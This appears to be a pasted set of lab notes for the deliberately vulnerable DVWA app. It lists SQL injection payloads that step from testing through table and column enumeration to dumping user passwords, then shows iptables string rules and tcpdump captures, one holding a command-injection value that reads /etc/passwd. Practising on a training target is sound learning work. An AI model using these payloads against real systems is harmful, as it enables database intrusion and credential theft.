Advertisement
Guest User

Untitled

a guest
Jun 22nd, 2018
85
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.13 KB | None | 0 0
  1. =========================================================================
  2. DVWA
  3. =========================================================================
  4. 1.SQLi vs Manual Exploit
  5.  
  6. https://mimmoo.wordpress.com/2011/06/19/dvwa-damn-vulnerable-web-app/
  7. https://websec.ca/kb/sql_injection
  8. =========================================================================
  9. 1.1.Test
  10. %' or '0'='0
  11. =========================================================================
  12. 1.2.Display Database Version
  13. %' or 0=0 union select null, version() #
  14. =========================================================================
  15. 1.3.Display Database Version
  16. %' or 0=0 union select null, version() #
  17. =========================================================================
  18. 1.4.Display Database User
  19. %' or 0=0 union select null, user() #
  20. =========================================================================
  21. 1.5.Display Database Name
  22. %' or 0=0 union select null, database() #
  23. =========================================================================
  24. 1.6.Display all tables in information_schema
  25. %' and 1=0 union select null, table_name from information_schema.tables #
  26. =========================================================================
  27. 1.7.Display all the user tables in information_schema
  28. %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
  29. =========================================================================
  30. 1.8.Display all the columns fields in the information_schema user table
  31. %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
  32. =========================================================================
  33. 1.9.Display all the columns field contents in the information_schema user table
  34. %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
  35. =======================================================================
  36.  
  37.  
  38. Iptables -nvL
  39. =======================================================================
  40. Blocked Web Attack Top 10 OWASP vs iptables vs tcpdump
  41. =======================================================================
  42. iptables -I INPUT -p tcp --dport 80 -m string --algo bm --string '%27' -j DROP
  43. -->block SQLi
  44. ->http://demo.nickname.net/demo/testpak/encode.pl(check string to filter ex::27==singlequote(‘)
  45. =====================================================================
  46. root@metasploitable:~# tcpdump -qns 0 -A port 80
  47. E..JP.@..............?.P...kOy. P...#...GET /dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit =====================================================================
  48. iptables -I INPUT -p tcp --dport 80 -m string --algo bm --string '%26' -j DROP
  49. ->Block CMDi
  50. ->http://demo.nickname.net/demo/testpak/encode.pl(check string to filter ex:%26==&
  51. =====================================================================
  52. root@metasploitable:~# tcpdump -qns 0 -A port 80
  53. ip=8.8.8.8%26cat+%2Fetc%2Fpasswd&submit=submit
  54. =====================================================================
  55.  
  56. =====================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement